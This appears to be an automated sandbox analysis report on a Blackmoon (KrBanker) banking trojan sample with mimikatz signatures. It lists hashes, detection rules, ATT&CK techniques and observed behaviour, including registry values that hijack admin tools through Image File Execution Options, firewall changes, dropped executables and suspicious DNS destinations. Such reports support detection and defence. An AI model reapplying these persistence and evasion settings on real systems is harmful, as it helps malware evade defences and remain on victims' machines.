blackmoon | ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346be

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
18-12-2024 06:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
Size

9.3MB
MD5

c65e01412858c22d393532d0395fbab0
SHA1

b491abf5b13c5c76b17be974058cbfce126fda64
SHA256

ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346be
SHA512

10675ca4a9b09817790141743a1ec3f1987b88ae200c700573217245548dc34557aa8be0813887f681dc9c716c1aa3028e99a22933e32fff6045855c89ed92d4
SSDEEP

196608:K2c1uwl1CPwDv3uFhi43v13uFnCPws8S/VW08Sr8lQeY3YgOFmknGzwHIPHd9DPK:KnEwl1CPwDv3uFY43v13uFnCPwa/VW0E

Score

10^/10

blackmoon mimikatz banker defense_evasion discovery evasion execution persistence privilege_escalation trojan upx

Malware Config

Signatures

Blackmoon family
blackmoon
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 5 IoCs

resource	yara_rule
behavioral1/memory/2712-0-0x0000000000400000-0x0000000000D0F000-memory.dmp	family_blackmoon
behavioral1/memory/2712-12-0x0000000000400000-0x0000000000D0F000-memory.dmp	family_blackmoon
behavioral1/files/0x0008000000016d66-24.dat	family_blackmoon
behavioral1/memory/2392-28-0x0000000000400000-0x0000000000D0F000-memory.dmp	family_blackmoon
behavioral1/memory/2972-67-0x0000000000400000-0x0000000000469000-memory.dmp	family_blackmoon

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

mimikatz is an open source tool to dump credentials on Windows 4 IoCs

resource	yara_rule
behavioral1/memory/2712-0-0x0000000000400000-0x0000000000D0F000-memory.dmp	mimikatz
behavioral1/memory/2712-12-0x0000000000400000-0x0000000000D0F000-memory.dmp	mimikatz
behavioral1/files/0x0008000000016d66-24.dat	mimikatz
behavioral1/memory/2392-28-0x0000000000400000-0x0000000000D0F000-memory.dmp	mimikatz

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	zthqhle.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	zthqhle.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	zthqhle.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1396	netsh.exe
1556	netsh.exe

Executes dropped EXE 11 IoCs

pid	Process
2160	hentai.exe
3000	koaaya.exe
2392	zthqhle.exe
2828	hentai.exe
2772	zthqhle.exe
2512	hentai.exe
2972	ivtowqsrxkbhlqw7487.exe
2184	zthqhle.exe
1932	hentai.exe
2172	zthqhle.exe
2828	hentai.exe

Loads dropped DLL 14 IoCs

pid	Process
2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
2712	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
1748	cmd.exe
1748	cmd.exe
2392	zthqhle.exe
2392	zthqhle.exe
2772	zthqhle.exe
2772	zthqhle.exe
2772	zthqhle.exe
2772	zthqhle.exe
2184	zthqhle.exe
2184	zthqhle.exe
2172	zthqhle.exe
2172	zthqhle.exe

Unexpected DNS network traffic destination 49 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.75.173.177
Destination IP	142.4.204.111
Destination IP	165.227.40.43
Destination IP	207.148.83.241
Destination IP	165.227.40.43
Destination IP	13.239.157.177
Destination IP	142.4.205.47
Destination IP	144.76.103.143
Destination IP	208.87.98.37
Destination IP	161.97.219.84
Destination IP	161.97.219.84
Destination IP	5.132.191.104
Destination IP	94.103.153.176
Destination IP	207.192.71.13
Destination IP	51.77.227.84
Destination IP	79.124.7.81
Destination IP	207.148.83.241
Destination IP	104.128.239.75
Destination IP	51.77.227.84
Destination IP	79.124.7.81
Destination IP	163.172.168.171
Destination IP	163.172.168.171
Destination IP	13.239.157.177
Destination IP	142.4.204.111
Destination IP	142.4.204.111
Destination IP	207.192.71.13
Destination IP	178.63.116.152
Destination IP	163.172.168.171
Destination IP	178.63.116.152
Destination IP	165.227.40.43
Destination IP	104.128.239.75
Destination IP	161.97.219.84
Destination IP	94.103.153.176
Destination IP	144.76.103.143
Destination IP	208.87.98.37
Destination IP	79.124.7.81
Destination IP	144.76.103.143
Destination IP	94.103.153.176
Destination IP	178.63.116.152
Destination IP	51.77.227.84
Destination IP	51.75.173.177
Destination IP	5.132.191.104
Destination IP	207.192.71.13
Destination IP	188.226.146.136
Destination IP	188.226.146.136
Destination IP	13.239.157.177
Destination IP	188.226.146.136
Destination IP	51.75.173.177
Destination IP	207.148.83.241

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

remove IFEO.

defense_evasion

Clear Persistence

T1070.009

description	ioc	Process
Delete value	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger	zthqhle.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\koaaya.exe	hentai.exe
File opened for modification	C:\Windows\SysWOW64\koaaya.exe	hentai.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	zthqhle.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2972-61-0x0000000000400000-0x0000000000469000-memory.dmp	upx
behavioral1/files/0x0008000000017466-60.dat	upx
behavioral1/memory/2772-57-0x0000000010000000-0x000000001000B000-memory.dmp	upx
behavioral1/memory/2972-67-0x0000000000400000-0x0000000000469000-memory.dmp	upx

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\zhquqleq\zthqhle.exe	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
File opened for modification	C:\Windows\zhquqleq\zthqhle.exe	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
File created	C:\Windows\zhquqleq\ivtowqsrxkbhlqw7487.exe	zthqhle.exe
File created	C:\Windows\Fonts\zthqhle.exe	zthqhle.exe
File opened for modification	C:\Windows\Fonts\zthqhle.exe	zthqhle.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2804	sc.exe
2876	sc.exe
2840	sc.exe
2332	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zthqhle.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zthqhle.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hentai.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ddc71e96a8aa5f9bcd2d73eba01b7573faa46a9ccc3c4cb90289fc006e9346beN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zthqhle.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nslookup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	koaaya.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1748	cmd.exe
844	PING.EXE

NSIS installer 1 IoCs

installer

resource	yara_rule
behavioral1/files/0x0008000000016d66-24.dat	nsis_installer_2

Modifies data under HKEY_USERS 57 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	zthqhle.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	zthqhle.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	zthqhle.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	zthqhle.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-f1-56-4b-64-c9	zthqhle.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1e-f1-56-4b-64-c9\WpadDecision = "0"	zthqhle.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
